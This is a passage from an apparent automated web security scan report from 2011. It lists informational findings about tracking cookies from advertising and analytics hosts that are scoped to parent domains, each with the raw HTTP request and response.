Confidence:	Certain
Host:	http://m.adnxs.com
Path:	/msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:37:36 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dB506C07761D7465D924574124E3C14DF HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN

Response

15.22. http://map.media6degrees.com/orbserv/aopix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://map.media6degrees.com
Path:	/orbserv/aopix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

clid=2ljtllp01170xrd52zkwjuxh0e4d100837010i02408; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
rdrlst=40415xylk60qe00000002370113bolk7pyq0000000137010znmlk346200000003370110poljyxb4000000053701; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
sglst=2020s0t7ljyxb408snm00537010i02405ag3ljyxb408snm00537010i02405; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
vstcnt=417k010r014uzg6118e1002; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/aopix?pixId=6387&pcv=56&cb=2534812616&topHref=http%3A%2F%2Fwww.livejournal.com%2F HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2ljtllp0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=012020h1ljtllpxzt1tzu; clid=2ljtllp01170xrd52zkwjuxh0cf4p00736010i01407; rdrlst=40315xylk60qe0000000136010znmlk346200000002360110poljyxb4000000043601; sglst=2020s0t7ljyxb4073fa00436010i01404ag3ljyxb4073fa00436010i01404; vstcnt=417k010r014uzg6118e1002

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0e4d100837010i02408; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: rdrlst=40415xylk60qe00000002370113bolk7pyq0000000137010znmlk346200000003370110poljyxb4000000053701; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: sglst=2020s0t7ljyxb408snm00537010i02405ag3ljyxb408snm00537010i02405; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: vstcnt=417k010r014uzg6118e1002; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Location: http://ad.afy11.net/ad?mode=7&publisher_dsp_id=5&external_user_id=xrd52zkwjuxh&custom_mon=0
Content-Length: 0
Date: Mon, 25 Apr 2011 14:37:38 GMT

15.23. http://mc.yandex.ru/watch/57617 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mc.yandex.ru
Path:	/watch/57617

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

yandexuid=1458985311303741205; domain=.yandex.ru; path=/; expires=Thu, 22-Apr-2021 14:20:05 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /watch/57617?rn=540876&cnt-class=1&page-ref=&page-url=http%3A%2F%2Fwebalta.ru%2F&browser-info=j:1:s:1920x1200x16:f:10.2.154:w:1125x981:z:-300:i:20110425092015:l:4.0.60129.0:en:utf-8:v:911:c:1:t:%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%D0%BE%D0%B2%D0%B0%D1%8F%20%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0%20Webalta&site-info=%7B%7D&wmode=3 HTTP/1.1
Host: mc.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:20:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:05 GMT
Expires: Mon, 25 Apr 2011 14:20:05 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://mc.yandex.ru/watch/57617/1?rn=540876&cnt-class=1&page-ref=&page-url=http%3A%2F%2Fwebalta.ru%2F&browser-info=j:1:s:1920x1200x16:f:10.2.154:w:1125x981:z:-300:i:20110425092015:l:4.0.60129.0:en:utf-8:v:911:c:1:t:%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%D0%BE%D0%B2%D0%B0%D1%8F%20%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0%20Webalta&site-info=%7B%7D&wmode=3
Set-Cookie: yandexuid=1458985311303741205; domain=.yandex.ru; path=/; expires=Thu, 22-Apr-2021 14:20:05 GMT
Set-Cookie: yabs-sid=377248491303741205; path=/
Content-Length: 0

15.24. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cmp=1_1303742471_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
uid=1_1303742471_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
kwd=1_1303742471_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
sit=1_1303742471_719:30:0_2451:50899:45799_3236:208862:208744_782:563148:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
cre=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
bpd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
apd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
scg=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
ppd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
afl=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303742441_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562769; uid=1_1303742441_1303179323923:6792170478871670; kwd=1_1303742441_11317:0_11717:0_11718:0_11719:0; sit=1_1303742441_719:0:0_2451:50869:45769_3236:208832:208714_782:563118:562769; cre=1_1303742441; bpd=1_1303742441; apd=1_1303742441; scg=1_1303742441; ppd=1_1303742441; afl=1_1303742441

Response

15.25. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EEIAFu8kjVmtjIMLyxuBAVcBzAaBsQDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA; expires=Sun, 24-Jul-2011 14:34:49 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=627389121;fpan=1;fpa=P0-962486039-1303741255035;ns=1;url=http%3A%2F%2Fgoods.adnectar.com%2Fstatic%2Fquantcast_1.html;ref=http%3A%2F%2Fwww.livejournal.com%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303741255031;tzo=300;a=p-42U4PptTYmdC- HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://goods.adnectar.com/static/quantcast_1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EGUAFu8kjVmtjIMLyxuBATcBzAaBsQDe0kyka4WR_4JMMMhgggv-JgLbZ6Qw

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=1160808&id=736181&id=961753&id=688926&id=1160806&id=1057233&id=1127643&id=1206656&t=2
Set-Cookie: d=EEIAFu8kjVmtjIMLyxuBAVcBzAaBsQDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA; expires=Sun, 24-Jul-2011 14:34:49 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 25 Apr 2011 14:34:49 GMT
Server: QS

15.26. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.rubiconproject.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=2939|1 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C2%2C%2C

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:54:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

15.27. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/dynamic_preroll_playlist.fmil

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
ymdt=0rO0ABXcSAAAEugAAA30AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:53:58 GMT; Path=/
ymvw=173_193_214_243_8AKTzxy2lLx8IW; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:53:58 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic_preroll_playlist.fmil?domain=133BeuXuCot&width=480&height=360&imu=medrect&sdk_ver=1.8.1.2&embedAutoDetect=false&sdk_url=http%3A%2F%2Fxs%2Emochiads%2Ecom%2Fstatic%2Fglobal%2Flib%2F HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:58 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_1_232
Set-Cookie: ymdt=0rO0ABXcSAAAEugAAA30AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:53:58 GMT; Path=/
YmDtHdr: @DT_GU
Ypp: @YP_1_1;46718_21629
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=173_193_214_243_8AKTzxy2lLx8IW; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:53:58 GMT; Path=/
Content-Type: application/smil
Content-Length: 3099
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<smil xmlns:yume="http://www.yumenetworks.com/resources/smilextensions" yume:refresh_time="0" yume:stagger_time="0" >
<head>
<layout>
<root-layout id="main" width="480" height="360" ba
...[SNIP]...

15.28. http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
ymf=0rO0ABXcFAadrgwA*; Domain=.yumenetworks.com; Expires=Tue, 24-May-2011 14:54:01 GMT; Path=/
yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif?replay_count=0&volume=100 HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; ymdt=0rO0ABXcSAAAEugAAA10AAQAAAOi7eGFI; ymvw=173_193_214_243_18R1PA3QCjJVp0

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:54:01 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_0_232
Set-Cookie: ymf=0rO0ABXcFAadrgwA*; Domain=.yumenetworks.com; Expires=Tue, 24-May-2011 14:54:01 GMT; Path=/
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
Location: http://ad.doubleclick.net/imp;v1;f;238884748;0-0;0;61850871;1|1;41734709|41752496|1;;cs=o;%3fhttp://ad.doubleclick.net/dot.gif?1303743241655
Content-Length: 0
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: image/gif

15.29. http://pogoda.webalta.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pogoda.webalta.ru
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pogoda_reg=10290; expires=Tue, 24-Apr-2012 14:20:55 GMT; path=/; domain=.webalta.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

15.30. http://r2.mail.ru/b12179277.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12179277.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=pPUGAEqlaAAA; expires=Wed, 24-Apr-13 14:20:49 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179277.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:20:49 GMT
Content-Type: image/gif
Content-Length: 258
Connection: keep-alive
Set-Cookie: p=pPUGAEqlaAAA; expires=Wed, 24-Apr-13 14:20:49 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:20:49 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a..!...............................................................................................................................................................................................
...[SNIP]...

15.31. http://r2.mail.ru/b12179279.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12179279.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=6ooGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179279.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/gif
Content-Length: 294
Connection: keep-alive
Set-Cookie: p=6ooGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a{.......................8..P.....I..$..A...............!.......,....{......0.I..8.....!.di.h..l.....tm.x..|..@.DA,....r.l:...BR.Z...v..z.... .....z.n....|>.$...~......... .......................
...[SNIP]...

15.32. http://r2.mail.ru/b12179280.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12179280.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=t9UGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179280.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/gif
Content-Length: 70
Connection: keep-alive
Set-Cookie: p=t9UGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a...................!.......,.............#....D-..,.i^'T....R..;

15.33. http://r2.mail.ru/b12201458.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12201458.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=19oGAErbVQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12201458.png HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
